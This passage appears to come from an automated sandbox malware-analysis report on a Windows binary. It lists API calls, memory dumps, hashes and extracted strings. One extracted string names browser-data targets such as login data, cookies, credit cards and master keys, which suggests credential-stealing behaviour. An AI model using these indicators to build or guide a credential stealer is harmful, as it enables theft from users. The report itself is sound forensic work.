                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1659193697-0
                                                                                                                                              • Opcode ID: ac1b358337dca50b234fc3dc3a64ea0e40d9c39c4fce7a5d9b49bc41b1c3f848
                                                                                                                                              • Instruction ID: 47f9f9a9bf0d79d52291fec9dc3460f5edb29a58d4097f6a8864e100f0027ea6
                                                                                                                                              • Opcode Fuzzy Hash: ac1b358337dca50b234fc3dc3a64ea0e40d9c39c4fce7a5d9b49bc41b1c3f848
                                                                                                                                              • Instruction Fuzzy Hash: 2191A371E00219DFDF20EFA4D844BEEBBB4FF04314F94452AE551A7290D7789946CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Strings
                                                                                                                                              • nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,, xrefs: 0258563C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 1910495013-2124985433
                                                                                                                                              • Opcode ID: b470aa659ba974f0105161b82f241e6a33901545b2bc54a9d6d5dd911d09fdde
                                                                                                                                              • Instruction ID: d17bb74b1c6ac70ad2d3298534e2a877458adc55fe1d6128dab77f2d246d51d9
                                                                                                                                              • Opcode Fuzzy Hash: b470aa659ba974f0105161b82f241e6a33901545b2bc54a9d6d5dd911d09fdde
                                                                                                                                              • Instruction Fuzzy Hash: E081C230608741DFDB25DF20C484BEABBE2BF99304F04492DD9895B3A1DB716895CF46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SysAllocString.OLEAUT32 ref: 0042D74B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042D8B2
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042D8D9
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0042D93D
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0042D952
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0042D967
                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042D9A2
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042D9B2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StringVariant$ClearFree$AllocChangeType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 984216764-0
                                                                                                                                              • Opcode ID: f945ae4cef94d89ca0ab2fcfcb01154a0f7e82251910b561d33c7f77115089c5
                                                                                                                                              • Instruction ID: 88606afa4f30e9e75de13378e47aca7ec09a9b99aa19c6302e81d3cbef9f0d5a
                                                                                                                                              • Opcode Fuzzy Hash: f945ae4cef94d89ca0ab2fcfcb01154a0f7e82251910b561d33c7f77115089c5
                                                                                                                                              • Instruction Fuzzy Hash: 89517E71E00319EFDF20EFA4E884AEEBBB9BF04300F90452AF555A7151D7789A45CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(76170A60,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041ADC6
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041ADDA
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(76170A60,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041ADFC
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76170A60,00000000,?,?,?,?,00415EF3), ref: 0041AE30
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041AE52
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041AE6B
                                                                                                                                              • GetEnvironmentStrings.KERNEL32(76170A60,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041AE81
                                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041AEBD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 883850110-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 00421C98
                                                                                                                                              • lstrcmpA.KERNEL32(?,?), ref: 00421CA4
                                                                                                                                              • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00421CB6
                                                                                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00421CD6
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00421CDE
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00421CE8
                                                                                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00421CF5
                                                                                                                                              • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00421D0D
                                                                                                                                                • Part of subcall function 00428D39: GlobalFlags.KERNEL32(?), ref: 00428D43
                                                                                                                                                • Part of subcall function 00428D39: GlobalUnlock.KERNEL32(?,00000000,?,00421D07,?,00000000,?,?,00000000,00000000,00000002), ref: 00428D54
                                                                                                                                                • Part of subcall function 00428D39: GlobalFree.KERNEL32(?), ref: 00428D5F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 168474834-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040F320: CoGetClassObject.OLE32(?,?,00000000,0043B5B0,?), ref: 0040F340
                                                                                                                                              • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00410B86
                                                                                                                                              • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00410BA7
                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00410BFA
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00410C08
                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00410C20
                                                                                                                                              • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00410C43
                                                                                                                                              • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00410C5F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GlobalLock$Bytes$Create$AllocClassDocfileObjectOpenStorageUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3681960158-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime, xrefs: 0257C3A0
                                                                                                                                              • APPDATA, xrefs: 0257C521
                                                                                                                                              • path*fatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 0257C3CD
                                                                                                                                              • a Display implementation returned an error unexpectedly, xrefs: 0257C303
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: APPDATA$a Display implementation returned an error unexpectedly$nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime$path*fatal runtime error: I/O error: operation failed to complete synchronously
                                                                                                                                              • API String ID: 0-422089487
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578000
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B96
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578019
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579F7C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FA0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FBA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$Value$CryptRandom
                                                                                                                                              • String ID: `async fn` resumed after completion
                                                                                                                                              • API String ID: 740635937-507674517
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,?,0043B308,00000038,0041B383,?,00000000,00000000,00417F33,00000000,00000000,0043A9D8,0000001C,00417C5C,00000001,00000020), ref: 0041E78F
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041E7A2
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00417F33,?,00000000,00000000), ref: 0041E7E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info$ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1166650589-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,00120114,000000EF,E8F289D9,?,00000000,00000000), ref: 025C747B
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C7498
                                                                                                                                              • SetFileInformationByHandle.KERNEL32(00000000,00000006,00000000,00000008), ref: 025C74C3
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C74E1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,025CA785,?), ref: 025C7501
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C750C
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 025C7519
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$FileHandle$CloseCreateFreeHeapInformation
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4103088332-0
                                                                                                                                              • Opcode ID: fbdfd72c518f04a0695e1ae7d12ed98450e4d1f1813a4ee3b79acb53f73e10d1
                                                                                                                                              • Instruction ID: 49815ff8d1e7f0bb199d3bb2458d509b8636c0c7fd42695f1b6078daf0f22988
                                                                                                                                              • Opcode Fuzzy Hash: fbdfd72c518f04a0695e1ae7d12ed98450e4d1f1813a4ee3b79acb53f73e10d1
                                                                                                                                              • Instruction Fuzzy Hash: 1F51C3709043409FEB248F64C48476AFFE9BF89714F24895DEC968B686E374C445CF59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: c99945b730b1963bc2476f908b4b7e966ae24083794790fc4a804f60559a5f7f
                                                                                                                                              • Instruction ID: deba55917dce0b94424f7e82dae8a9b9b47db0b8bf94c504a8a5c0270682857a
                                                                                                                                              • Opcode Fuzzy Hash: c99945b730b1963bc2476f908b4b7e966ae24083794790fc4a804f60559a5f7f
                                                                                                                                              • Instruction Fuzzy Hash: 2C519072D00319EFDF21EFA4D884AEEBBB5BF04310F90452AF511A7150D774A945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 21f38ccec4fa0e8b30d552f577ba58be143ccf844956009ce64557762c5bc80d
                                                                                                                                              • Instruction ID: 03b0e499ed1856b55c8dcbea2a45d420b7c6c419c53f8268e212c6394d836cd7
                                                                                                                                              • Opcode Fuzzy Hash: 21f38ccec4fa0e8b30d552f577ba58be143ccf844956009ce64557762c5bc80d
                                                                                                                                              • Instruction Fuzzy Hash: 22516D71E00319EFDF20EFA4E884AEEBBB5BF08300F90452AF555A7251D7789945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 0f93b15981eb83b0008622cebca6e7edd8fc0778c5b73fd08b63520a5e626df8
                                                                                                                                              • Instruction ID: 6e50089abeb2bdf91b19714a5c651368d8dc676127325ce66d1f1f29e3b16f1f
                                                                                                                                              • Opcode Fuzzy Hash: 0f93b15981eb83b0008622cebca6e7edd8fc0778c5b73fd08b63520a5e626df8
                                                                                                                                              • Instruction Fuzzy Hash: 69517D71E00319EFDF24EFA4E884AEEBBB9BF04300F90452AF551A7250D7789945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 827ef1f6ee7b75c145e33e34f9742a54bc848cad72a190445feeb5b0033f898c
                                                                                                                                              • Instruction ID: f237654dfe9b0de4e7d9c7904e21352c824fde659a4a83de7e0f8eff9bac242a
                                                                                                                                              • Opcode Fuzzy Hash: 827ef1f6ee7b75c145e33e34f9742a54bc848cad72a190445feeb5b0033f898c
                                                                                                                                              • Instruction Fuzzy Hash: D3516F71E00319EFDF20EFA4D884ADEBBB9BF08300F90452AF555A7250D7749945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 4a061ed6ea16155ebb7b5c787c568175eb317ebc6f7b48173005574961f5fb9e
                                                                                                                                              • Instruction ID: 58d113b5c7ff70747419b4c64d9a6ceb5b586f213f15031ce77f902832e347a1
                                                                                                                                              • Opcode Fuzzy Hash: 4a061ed6ea16155ebb7b5c787c568175eb317ebc6f7b48173005574961f5fb9e
                                                                                                                                              • Instruction Fuzzy Hash: 11518F71E00319EFDF20EFA4E884AEEBBB9BF04300F90452AF555A7151D7789A45CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 00424214
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042423B
                                                                                                                                              • UpdateWindow.USER32(?), ref: 00424255
                                                                                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 00424279
                                                                                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 00424293
                                                                                                                                              • UpdateWindow.USER32(?), ref: 004242D9
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042430D
                                                                                                                                                • Part of subcall function 0042663C: GetWindowLongA.USER32(?,000000F0), ref: 00426648
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2853195852-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,?,?,?,?,?,0042DD38,000000FF), ref: 00401A16
                                                                                                                                              • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401A7D
                                                                                                                                              • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 00401A88
                                                                                                                                                • Part of subcall function 00401820: FindResourceA.KERNEL32(?,?,00000006), ref: 0040183A
                                                                                                                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401AC5
                                                                                                                                              • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401AD9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$AppendMessageSend$FindResourceSystem
                                                                                                                                              • String ID: user-12345678
                                                                                                                                              • API String ID: 858472958-2755188220
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetWindow.USER32(?,00000002), ref: 004145E0
                                                                                                                                              • GetParent.USER32(?), ref: 004145F1
                                                                                                                                              • GetWindow.USER32(?,00000002), ref: 00414614
                                                                                                                                              • GetWindow.USER32(?,00000002), ref: 00414626
                                                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00414635
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0041464F
                                                                                                                                              • GetTopWindow.USER32(?), ref: 00414675
                                                                                                                                              Memory Dump Source
